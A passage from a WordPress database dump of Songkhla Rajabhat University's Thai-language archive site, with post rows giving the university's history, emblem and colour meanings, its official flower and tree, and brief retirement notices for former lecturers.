(98, 1, '2019-05-26 14:38:12', '2019-05-26 07:38:12', 'บันทึกเรื่องราวต่างๆ ของมหาวิทยาลัยราชภัฏสงขลา เช่น ประวัติ, สี, ตรา, ดอกไม้, ต้นไม้, เพลง, ครุยวิทยะฐานะ, ทำเนียบผู้บริหาร, อาจารย์เกษียณอายุราชการ, บัณฑิตกิตติมศักดิ์, บุคคลดีเด่น, เหตุการณ์ ข่าว, ภาพแห่งความทรงจำ, ผลงานอาจารย์ นักศึกษา, เอกสารเผยแพร่ ของมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n<a href="http://www.skru.ac.th" target="_blank" rel="noopener noreferrer"><img class="aligncenter wp-image-11 size-medium" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU-S-1-234x300.png" alt="" width="234" height="300" /></a>\r\n\r\n&nbsp;\r\n\r\nhttps://www.youtube.com/watch?v=y22195UuDTg', 'จดหมายเหตุ มหาวิทยาลัยราชภัฏสงขลา', '', 'inherit', 'closed', 'closed', '', '5-revision-v1', '', '', '2019-05-26 14:38:12', '2019-05-26 07:38:12', '', 5, 'http://172.17.40.11/wp511/?p=98', 0, 'revision', '', 0),
(99, 1, '2019-05-26 14:40:44', '2019-05-26 07:40:44', '<img class="size-medium wp-image-7 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/skru-300x158.jpg" alt="" width="300" height="158" />\r\n\r\nประวัติมหาวิทยาลัยราชภัฏสงขลา มหาวิทยาลัยราชภัฏสงขลา เป็นสถาบันอุดมศึกษาที่เก่าแก่ที่สุดแห่งหนึ่งของภาคใต้ และเป็นสถาบันที่มีพัฒนาการอย่างต่อเนื่องตลอดมา ตั้งแต่ยังมีฐานะเป็นเพียงโรงเรียนฝึกหัดครูมณฑล จนกระทั่งเป็นมหาวิทยาลัยราชภัฏสงขลา ดังเช่นปัจจุบัน\r\n\r\nในปีพ.ศ.2462เมื่อธรรมการมณฑลนครศรีธรรมราชซึ่งขณะนั้นอยู่ที่สงขลา และธรรมการจังหวัดสงขลาได้คิดผลิตครูมณฑลขึ้นเพื่อให้ไปทำหน้าที่สอนในระดับประถมศึกษาจึงได้จัดตั้งโรงเรียนฝึกหัดครูมณฑลขึ้น โดยให้เรียนร่วมกับโรงเรียนประจำมณฑลนครศรีธรรมราช(คือโรงเรียนมหาวชิราวุธซึ่งขณะนั้นตั้งอยู่ที่บริเวณโรงเรียนวิเชียรชมในปัจจุบัน) รับนักเรียน จบชั้นประถมบริบูรณ์(ประถมปีที่3)เข้าเรียนตามหลักสูตรป.4,ป.5และป.6โดยเพิ่มวิชาครูเป็นพิเศษผู้สำเร็จการศึกษาตามหลักสูตรดังกล่าวเรียกว่าครูประกาศนียบัตรมณฑล\r\n\r\nในปี พ.ศ. 2464 มีการประกาศใช้พระราชบัญญัติประถมศึกษา ธรรมการมณฑลจึงได้จัดตั้งโรงเรียนฝึกหัดครูประจำมณฑลขึ้นโดยเฉพาะเมื่อ พ.ศ. 2468 โดยตั้งที่ตำบลท่าชะมวง อำเภอกำแพงเพชร (ปัจจุบันคืออำเภอรัตภูมิ) จังหวัดสงขลา เรียกว่าโรงเรียนฝึกหัดครูมูล (ปัจจุบันเป็นที่ตั้งของวิทยาลัยเกษตรกรรมและเทคโนโลยีสงขลา) โดยรับนักเรียนที่จบ ม.3 หรือครูที่ทางอำเภอและจังหวัดต่าง ๆ ส่งมาเรียน กำหนด 2 ปี สำเร็จแล้วจะได้รับประกาศนียบัตรวิชาชีพครูมูล(ป.)\r\n\r\nต่อมาได้มีพระราชบัญญัติว่าด้วยการบริหารแห่งราชอาณาจักรสยาม พ.ศ. 2476 ให้เลิกการแบ่งเขตการ ปกครองเป็นมณฑล โรงเรียนฝึกหัดครูมูลประจำ มณฑลนครศรีธรรมราชที่ท่าชะมวง จึงได้เปลี่ยนเป็นโรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัด เมื่อปี พ.ศ. 2477 โดยรับนักเรียนที่เรียน ป.6 หรือ ม.2 (ตามแผน การศึกษาแห่งชาติ พ.ศ. 2475) เข้าเรียนมีกำหนด 2 ปี ครั้น พ.ศ. 2482 จึงได้เปลี่ยนมาเป็นรับนักเรียน ม.3 เข้าเรียน มีกำหนด 2 ปี ผู้สำเร็จการศึกษาจะได้ประกาศ นียบัตรจังหวัด (ว.)\r\n\r\nนอกจากนี้โรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัด ยังรับนักเรียนที่เตรียมไว้เพื่อบรรจุเป็นครูประชาบาล ซึ่งทางจังหวัดต่าง ๆ ได้คัดเลือกนักเรียนที่จบ ป.4 จากตำบลทุรกันดารในจังหวัดนั้น ๆ มาเข้าเรียน มีกำหนด 3 ปี เมื่อสำเร็จการศึกษาแล้ว จะได้ประโยคครูประชาบาล (ป.บ.) และกลับไปเป็นครูในตำบลที่ตนมีภูมิ ลำเนาอยู่\r\n\r\nปี พ.ศ. 2482 โรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัดสงขลา ได้ย้ายจากท่าชะมวงมาเรียนที่ตำบลคอหงส์ อำเภอหาดใหญ่ และในปี พ.ศ. 2490 ก็เปลี่ยน ฐานะจากโรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัดเป็นโรงเรียนฝึกหัดครูมูลและมี การปรับปรุงหลักสูตรใหม่ โดยรับนักเรียนที่จบชั้นมัธยมปีที่ 6 หรือประโยคประกาศ นียบัตรครูมูล (ว.) เข้าเรียนต่ออีก 1 ปี สำเร็จแล้วจะได้รับประกาศนียบัตรครูมูล (ป.)\r\n\r\nต่อมาใน พ.ศ. 2498 ก็ได้เปิดสอนหลักสูตรประกาศนียบัตรวิชาการศึกษา โดยรับนักเรียนที่จบ ม.6 เข้าเรียน 2 ปี ผู้สำเร็จการศึกษาจะได้รับประกาศนียบัตร วิชาการศึกษา (ป.กศ.) และโรงเรียนฝึกหัดครูมูลสงขลาก็เปลี่ยนเป็นโรงเรียนฝึกหัดครูสงขลา จนกระทั่งเมื่อวันที่ 1 มิถุนายน พ.ศ.2499 จึงได้ย้ายมาตั้งอยู่ ณ บริเวณ บ้านเขารูปช้าง อำเภอเมือง จังหวัดสงขลา อันเป็นสถานที่ตั้งในปัจจุบันและได้ยกฐานะเป็นวิทยาลัยครูสงขลา เมื่อวันที่ 1 พฤษภาคม พ.ศ. 2504 อีกทั้งได้ขยายชั้น เรียนไปจนถึงระดับประกาศนียบัตรวิชาการศึกษาชั้นสูง (ป.กศ.สูง) ในปีเดียวกันนั้นเอง\r\n\r\nครั้นเมื่อถึงปี พ.ศ. 2518 รัฐบาลได้ประกาศใช้พระราชบัญญัติวิทยาลัยครู พ.ศ. 2518 ทำให้วิทยาลัยครูสงขลาเปิดสอนถึงระดับปริญญาตรี ในสาขาครุศาสตร์ โดยรับนักศึกษาที่เรียนจบ ป.กศ.สูง หรือครูประจำการ ที่ได้รับวุฒิ พ.ม. เข้าศึกษาต่อ 2 ปี ผู้สำเร็จการศึกษาจะได้รับวุฒิครุศาสตรบัณฑิต (ค.บ.) และในปี พ.ศ.2522 ก็ได้เปิดโครงการอบรมครูประจำการและบุคลากรทางการศึกษา (อ.ค.ป.)ในระดับ ป.กศ.ชั้นสูงและระดับปริญญาตรี (ค.บ.)หลังจากนั้นในปี พ.ศ.2524 ก็ได้ร่วมมือกับ มหาวิทยาลัยสงขลานครินทร์ เปิดสอนหลักสูตรการโรงแรมและการท่องเที่ยว กับหลักสูตรการเพาะเลี้ยงสัตว์น้ำโดยเรียกโครงการนี้ว่า วิทยาลัยชุมชนสงขลา\r\n\r\nต่อมาในปี พ.ศ.2527 รัฐบาลได้ประกาศใช้พระราชบัญญัติวิทยาลัยครู พ.ศ. 2527 ให้วิทยาลัยครูทำหน้าที่ผลิตครูและเปิดสอนวิชาชีพ ตามความต้องการและ ความจำเป็นของท้องถิ่น วิทยาลัยครูสงขลา จึงได้ผลิตครูระดับปริญญาตรี ครุศาสตรบัณฑิต และบัณฑิตหรือประกาศนียบัตรวิชาชีพอื่นๆ ตามความต้องการและความ จำเป็น ของท้องถิ่นตั้งแต่บัดนั้นเป็นต้นมา และในปี พ.ศ. 2529 ได้เปิดการศึกษาสำหรับบุคลากรประจำการ (กศ.บป.) ในระดับอนุปริญญาและระดับปริญญาตรีสาขา ครุศาสตร์ ซึ่งต่อมาก็ได้ขยายไปสู่สาขาอื่น ๆ คือ ศิลปศาสตร์ และ วิทยาศาสตร์ ดังที่เป็นอยู่ในปัจจุบัน\r\n\r\nประวัติศาสตร์แห่งการเปลี่ยนแปลงครั้งสำคัญ ของสถาบันการศึกษาแห่งนี้ได้เกิดขึ้นอีกครั้งเมื่อ พระบาทสมเด็จพระเจ้าอยู่หัว ทรงพระกรุณาโปรดเกล้า ฯ พระ- ราชทานนาม “ ราชภัฏ ” แทนชื่อวิทยาลัยครูทั่วประเทศ เมื่อวันที่ 14 กุมภาพันธ์ พ.ศ. 2535 ทำให้วิทยาลัยครูสงขลา เปลี่ยนชื่อ สถาบันราชภัฏสงขลา ตั้งแต่บัดนั้น เป็นต้นมา สถาบันราชภัฏสงขลาได้มีความเจริญก้าวหน้ามาเป็นลำดับ จนสามารถเปิดสอนถึงระดับบัณฑิตศึกษาได้ในปี พ.ศ. 2544 และเมื่อวันที่ 15 มิถุนายน พ.ศ. 2547 ก็ได้รับการยกฐานะเป็น มหาวิทยาลัยราชภัฏสงขลา ในที่สุด โดยผู้ช่วยศาสตราจารย์ ดร.ไพโรจน์ ด้วงวิเศษ ดำรงตำแหน่งอธิการบดี', 'ประวัติมหาวิทยาลัยราชภัฏสงขลา', '', 'inherit', 'closed', 'closed', '', '17-revision-v1', '', '', '2019-05-26 14:40:44', '2019-05-26 07:40:44', '', 17, 'http://172.17.40.11/wp511/?p=99', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(100, 1, '2019-05-26 14:42:30', '2019-05-26 07:42:30', '<span style="color: #0000ff;"><strong>ตราสัญลักษณ์ประจำมหาวิทยาลัยราชภัฎสงขลา</strong></span>\r\n\r\n<img class="size-full wp-image-67 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU3.gif" alt="" width="180" height="220" />\r\n\r\nเป็นรูปวงรีสองวงล้อมตราพระราชลัญจกรของพระบาทสมเด็จพระเจ้าอยู่หัวภูมิพลอดุลยเดช ที่พระราชทานให้แก่มหาวิทยาลัยราชภัฏ ภายในวงรีด้านบนเป็นอักษรภาษาไทยเขียนว่า\r\n\r\n"มหาวิทยาลัยราชภัฏสงขลา" ด้านล่างเป็นอักษรภาษาอังกฤษเขียนว่า " SONGKHLA RAJABHAT UNIVERSITY"\r\n\r\n<img class="alignnone size-full wp-image-77" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/blue.png" alt="" width="77" height="40" /> สีน้ำเงิน แทนค่า สถาบันพระมหากษัตริย์ผู้ให้กำเนิด และพระราชทานนามมหาวิทยาลัยราชภัฏ\r\n\r\n<img class="alignnone size-full wp-image-79" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/green.png" alt="" width="77" height="40" /> สีเขียว แทนค่า แหล่งที่ตั้งของมหาวิทยาลัยราชภัฏ ทั้ง 36 แห่ง ในแหล่งธรรมชาติและสิ่งแวดล้อมที่สวยงาม\r\n\r\n<img class="alignnone size-full wp-image-78" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/gold.png" alt="" width="77" height="40" /> สีทอง แทนค่า ความเจริญรุ่งเรืองทางภูมิปัญญา\r\n\r\n<img class="alignnone size-full wp-image-80" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/orange.png" alt="" width="77" height="40" /> สีส้ม แทนค่า ความเจริญรุ่งเรืองของศิลปวัฒนธรรมท้องถิ่นที่ก้าวไกลใน 36 สถาบัน\r\n\r\n<img class="alignnone size-full wp-image-73" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/white.png" alt="" width="77" height="40" /> สีขาว แทนค่า ความคิดอันบริสุทธิ์ของนักปราชญ์แห่งพระบาทสมเด็จพระเจ้าอยู่หัว\r\n\r\n<span style="color: #0000ff;"><strong>สีประจำมหาวิทยาลัย</strong></span>\r\n\r\nสีแดง-ขาว\r\n\r\n<img class="alignnone size-full wp-image-72" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/red.png" alt="" width="77" height="40" /> สีแดง หมายถึง ความรัก ความเข้มแข็ง\r\n\r\n<img class="alignnone size-full wp-image-73" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/white.png" alt="" width="77" height="40" /> สีขาว หมายถึง ความถูกต้อง ความบริสุทธ์\r\n\r\nดังนั้น สีแดง - สีขาว หมายถึง นักศึกษาของมหาวิทยาลัยราชภัฏสงขลาทุกคนต้องกล้าคิด กล้าทำในสิ่งที่ถูกต้องดีงามด้วยความบริสุทธ์ใจ', 'สัญลักษณ์และสีประจำมหาวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '65-revision-v1', '', '', '2019-05-26 14:42:30', '2019-05-26 07:42:30', '', 65, 'http://172.17.40.11/wp511/?p=100', 0, 'revision', '', 0),
(101, 1, '2019-05-26 14:42:49', '2019-05-26 07:42:49', '<span style="color: #0000ff;"><strong>ตราสัญลักษณ์ประจำมหาวิทยาลัยราชภัฎสงขลา</strong></span>\r\n\r\n<img class="size-full wp-image-67 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU3.gif" alt="" width="180" height="220" />\r\n\r\nเป็นรูปวงรีสองวงล้อมตราพระราชลัญจกรของพระบาทสมเด็จพระเจ้าอยู่หัวภูมิพลอดุลยเดช ที่พระราชทานให้แก่มหาวิทยาลัยราชภัฏ ภายในวงรีด้านบนเป็นอักษรภาษาไทยเขียนว่า\r\n\r\n"มหาวิทยาลัยราชภัฏสงขลา" ด้านล่างเป็นอักษรภาษาอังกฤษเขียนว่า " SONGKHLA RAJABHAT UNIVERSITY"\r\n\r\n<img class="alignnone size-full wp-image-77" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/blue.png" alt="" width="77" height="40" /> สีน้ำเงิน แทนค่า สถาบันพระมหากษัตริย์ผู้ให้กำเนิด และพระราชทานนามมหาวิทยาลัยราชภัฏ\r\n\r\n<img class="alignnone size-full wp-image-79" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/green.png" alt="" width="77" height="40" /> สีเขียว แทนค่า แหล่งที่ตั้งของมหาวิทยาลัยราชภัฏ ทั้ง 36 แห่ง ในแหล่งธรรมชาติและสิ่งแวดล้อมที่สวยงาม\r\n\r\n<img class="alignnone size-full wp-image-78" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/gold.png" alt="" width="77" height="40" /> สีทอง แทนค่า ความเจริญรุ่งเรืองทางภูมิปัญญา\r\n\r\n<img class="alignnone size-full wp-image-80" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/orange.png" alt="" width="77" height="40" /> สีส้ม แทนค่า ความเจริญรุ่งเรืองของศิลปวัฒนธรรมท้องถิ่นที่ก้าวไกลใน 36 สถาบัน\r\n\r\n<img class="alignnone size-full wp-image-73" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/white.png" alt="" width="77" height="40" /> สีขาว แทนค่า ความคิดอันบริสุทธิ์ของนักปราชญ์แห่งพระบาทสมเด็จพระเจ้าอยู่หัว\r\n\r\n&nbsp;\r\n\r\n<span style="color: #0000ff;"><strong>สีประจำมหาวิทยาลัย</strong></span>\r\n\r\nสีแดง-ขาว\r\n\r\n<img class="alignnone size-full wp-image-72" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/red.png" alt="" width="77" height="40" /> สีแดง หมายถึง ความรัก ความเข้มแข็ง\r\n\r\n<img class="alignnone size-full wp-image-73" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/white.png" alt="" width="77" height="40" /> สีขาว หมายถึง ความถูกต้อง ความบริสุทธ์\r\n\r\nดังนั้น สีแดง - สีขาว หมายถึง นักศึกษาของมหาวิทยาลัยราชภัฏสงขลาทุกคนต้องกล้าคิด กล้าทำในสิ่งที่ถูกต้องดีงามด้วยความบริสุทธ์ใจ', 'สัญลักษณ์และสีประจำมหาวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '65-revision-v1', '', '', '2019-05-26 14:42:49', '2019-05-26 07:42:49', '', 65, 'http://172.17.40.11/wp511/?p=101', 0, 'revision', '', 0),
(102, 1, '2019-05-26 14:43:45', '2019-05-26 07:43:45', '<p style="text-align: center;"><span style="color: #0000ff;"><strong>ดอกไม้ประจำมหาวิทยาลัยราชภัฏสงขลา</strong></span></p>\r\n<img class="size-medium wp-image-83 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/fw01-300x195.jpg" alt="" width="300" height="195" />\r\n<p style="text-align: center;">ดอกปาริฉัตร</p>\r\n&nbsp;\r\n<p style="text-align: center;"><strong><span style="color: #0000ff;">ต้นไม้ประจำมหาวิทยาลัยราชภัฏสงขลา</span></strong></p>\r\n<img class="size-medium wp-image-84 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/salapee-225x300.jpg" alt="" width="225" height="300" />\r\n<p style="text-align: center;">ต้นสารภี</p>\r\nสารภี : ต้นไม้ประจำมหาวิทยาลัยราชภัฏสงขลา\r\n\r\nต้นไม้ชายฝั่งทะเล ที่ทรงคุณค่า มีลำต้นที่แข็งแกร่ง ทนทาน กลิ่นดอกที่หอมละมุน อ่อนหวาน ให้คุณประโยชน์ทั้งใช้ทำเป็นที่อยู่อาศัย\r\n\r\nและเป็นยา มหาวิทยาลัยราชภัฏสงขลา ซึ่งเป็นแหล่งที่พึ่งพิงหลักด้านวิทยาการท้องถิ่น จึงได้นำมาเป็นต้นไม้ประจำมหาวิทยาลัย', 'ดอกไม้และต้นไม้ประจำมหาวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '82-revision-v1', '', '', '2019-05-26 14:43:45', '2019-05-26 07:43:45', '', 82, 'http://172.17.40.11/wp511/?p=102', 0, 'revision', '', 0),
(103, 1, '2019-05-26 14:46:53', '2019-05-26 07:46:53', 'อาจารย์กมลทิพย์  มฤคทัต\r\n\r\nสังกัด คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2535', 'อาจารย์กมลทิพย์  มฤคทัต', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%81%e0%b8%a1%e0%b8%a5%e0%b8%97%e0%b8%b4%e0%b8%9e%e0%b8%a2%e0%b9%8c-%e0%b8%a1%e0%b8%a4%e0%b8%84%e0%b8%97%e0%b8%b1%e0%b8%95', '', '', '2019-05-26 14:46:53', '2019-05-26 07:46:53', '', 0, 'http://172.17.40.11/wp511/?p=103', 0, 'post', '', 0),
(104, 1, '2019-05-26 14:46:53', '2019-05-26 07:46:53', 'อาจารย์กมลทิพย์  มฤคทัต\r\n\r\nสังกัด คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2535', 'อาจารย์กมลทิพย์  มฤคทัต', '', 'inherit', 'closed', 'closed', '', '103-revision-v1', '', '', '2019-05-26 14:46:53', '2019-05-26 07:46:53', '', 103, 'http://172.17.40.11/wp511/?p=104', 0, 'revision', '', 0),
(105, 1, '2019-05-26 14:47:27', '2019-05-26 07:47:27', 'อาจารย์กุลธนา  หวานแก้ว\r\n\r\nสังกัด คณะมนุษย์ศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2535', 'อาจารย์กุลธนา  หวานแก้ว', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%81%e0%b8%b8%e0%b8%a5%e0%b8%98%e0%b8%99%e0%b8%b2-%e0%b8%ab%e0%b8%a7%e0%b8%b2%e0%b8%99%e0%b9%81%e0%b8%81%e0%b9%89%e0%b8%a7', '', '', '2019-05-26 14:47:27', '2019-05-26 07:47:27', '', 0, 'http://172.17.40.11/wp511/?p=105', 0, 'post', '', 0),
(106, 1, '2019-05-26 14:47:27', '2019-05-26 07:47:27', 'อาจารย์กุลธนา  หวานแก้ว\r\n\r\nสังกัด คณะมนุษย์ศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2535', 'อาจารย์กุลธนา  หวานแก้ว', '', 'inherit', 'closed', 'closed', '', '105-revision-v1', '', '', '2019-05-26 14:47:27', '2019-05-26 07:47:27', '', 105, 'http://172.17.40.11/wp511/?p=106', 0, 'revision', '', 0),
(107, 1, '2019-05-26 14:47:44', '2019-05-26 07:47:44', 'อาจารย์ภาษิต  เหล่าสุวรรณ\r\n\r\nสังกัด คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2535', 'อาจารย์ภาษิต  เหล่าสุวรรณ', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a0%e0%b8%b2%e0%b8%a9%e0%b8%b4%e0%b8%95-%e0%b9%80%e0%b8%ab%e0%b8%a5%e0%b9%88%e0%b8%b2%e0%b8%aa%e0%b8%b8%e0%b8%a7%e0%b8%a3', '', '', '2019-05-26 14:47:44', '2019-05-26 07:47:44', '', 0, 'http://172.17.40.11/wp511/?p=107', 0, 'post', '', 0),
(108, 1, '2019-05-26 14:47:44', '2019-05-26 07:47:44', 'อาจารย์ภาษิต  เหล่าสุวรรณ\r\n\r\nสังกัด คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2535', 'อาจารย์ภาษิต  เหล่าสุวรรณ', '', 'inherit', 'closed', 'closed', '', '107-revision-v1', '', '', '2019-05-26 14:47:44', '2019-05-26 07:47:44', '', 107, 'http://172.17.40.11/wp511/?p=108', 0, 'revision', '', 0),
(109, 1, '2019-05-26 14:48:22', '2019-05-26 07:48:22', 'อาจารย์อุบล  จิตต์ธรรม\r\n\r\nสังกัด คณะวิทยาศาสตร์และเทคโนโลยี  ประจำภาควิชาคหกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2535', 'อาจารย์อุบล  จิตต์ธรรม', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%ad%e0%b8%b8%e0%b8%9a%e0%b8%a5-%e0%b8%88%e0%b8%b4%e0%b8%95%e0%b8%95%e0%b9%8c%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1', '', '', '2019-05-26 14:48:22', '2019-05-26 07:48:22', '', 0, 'http://172.17.40.11/wp511/?p=109', 0, 'post', '', 0),
(110, 1, '2019-05-26 14:48:22', '2019-05-26 07:48:22', 'อาจารย์อุบล  จิตต์ธรรม\r\n\r\nสังกัด คณะวิทยาศาสตร์และเทคโนโลยี  ประจำภาควิชาคหกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2535', 'อาจารย์อุบล  จิตต์ธรรม', '', 'inherit', 'closed', 'closed', '', '109-revision-v1', '', '', '2019-05-26 14:48:22', '2019-05-26 07:48:22', '', 109, 'http://172.17.40.11/wp511/?p=110', 0, 'revision', '', 0),
(111, 1, '2019-05-26 14:48:57', '2019-05-26 07:48:57', 'ผู้ช่วยศาสตราจารย์นิติ  ลักขณา\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2537', 'ผู้ช่วยศาสตราจารย์นิติ  ลักขณา', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%99%e0%b8%b4%e0%b8%95%e0%b8%b4', '', '', '2019-05-26 14:48:57', '2019-05-26 07:48:57', '', 0, 'http://172.17.40.11/wp511/?p=111', 0, 'post', '', 0),
(112, 1, '2019-05-26 14:48:57', '2019-05-26 07:48:57', 'ผู้ช่วยศาสตราจารย์นิติ  ลักขณา\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2537', 'ผู้ช่วยศาสตราจารย์นิติ  ลักขณา', '', 'inherit', 'closed', 'closed', '', '111-revision-v1', '', '', '2019-05-26 14:48:57', '2019-05-26 07:48:57', '', 111, 'http://172.17.40.11/wp511/?p=112', 0, 'revision', '', 0),
(113, 1, '2019-05-26 14:49:33', '2019-05-26 07:49:33', 'อาจารย์ประพันธ์  ขวัญประดับ\r\n\r\nสังกัด คณะศิลปกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2537', 'อาจารย์ประพันธ์  ขวัญประดับ', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-%e0%b8%82%e0%b8%a7%e0%b8%b1%e0%b8%8d%e0%b8%9b%e0%b8%a3', '', '', '2019-05-26 14:49:33', '2019-05-26 07:49:33', '', 0, 'http://172.17.40.11/wp511/?p=113', 0, 'post', '', 0),
(114, 1, '2019-05-26 14:49:33', '2019-05-26 07:49:33', 'อาจารย์ประพันธ์  ขวัญประดับ\r\n\r\nสังกัด คณะศิลปกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2537', 'อาจารย์ประพันธ์  ขวัญประดับ', '', 'inherit', 'closed', 'closed', '', '113-revision-v1', '', '', '2019-05-26 14:49:33', '2019-05-26 07:49:33', '', 113, 'http://172.17.40.11/wp511/?p=114', 0, 'revision', '', 0),
(115, 1, '2019-05-26 14:49:49', '2019-05-26 07:49:49', 'อาจารย์ปรีดา  สังขรัตน์\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2537', 'อาจารย์ปรีดา  สังขรัตน์', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%9b%e0%b8%a3%e0%b8%b5%e0%b8%94%e0%b8%b2-%e0%b8%aa%e0%b8%b1%e0%b8%87%e0%b8%82%e0%b8%a3%e0%b8%b1%e0%b8%95%e0%b8%99%e0%b9%8c', '', '', '2019-05-26 14:49:49', '2019-05-26 07:49:49', '', 0, 'http://172.17.40.11/wp511/?p=115', 0, 'post', '', 0),
(116, 1, '2019-05-26 14:49:49', '2019-05-26 07:49:49', 'อาจารย์ปรีดา  สังขรัตน์\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2537', 'อาจารย์ปรีดา  สังขรัตน์', '', 'inherit', 'closed', 'closed', '', '115-revision-v1', '', '', '2019-05-26 14:49:49', '2019-05-26 07:49:49', '', 115, 'http://172.17.40.11/wp511/?p=116', 0, 'revision', '', 0),
(117, 1, '2019-05-26 14:50:20', '2019-05-26 07:50:20', 'ผู้ช่วยศาสตราจารย์ปรีดา  เทพหัสดิน ณ อยุธยา\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2537', 'ผู้ช่วยศาสตราจารย์ปรีดา  เทพหัสดิน ณ อยุธยา', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%9b%e0%b8%a3%e0%b8%b5%e0%b8%94', '', '', '2019-05-26 14:50:20', '2019-05-26 07:50:20', '', 0, 'http://172.17.40.11/wp511/?p=117', 0, 'post', '', 0),
(118, 1, '2019-05-26 14:50:20', '2019-05-26 07:50:20', 'ผู้ช่วยศาสตราจารย์ปรีดา  เทพหัสดิน ณ อยุธยา\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2537', 'ผู้ช่วยศาสตราจารย์ปรีดา  เทพหัสดิน ณ อยุธยา', '', 'inherit', 'closed', 'closed', '', '117-revision-v1', '', '', '2019-05-26 14:50:20', '2019-05-26 07:50:20', '', 117, 'http://172.17.40.11/wp511/?p=118', 0, 'revision', '', 0),
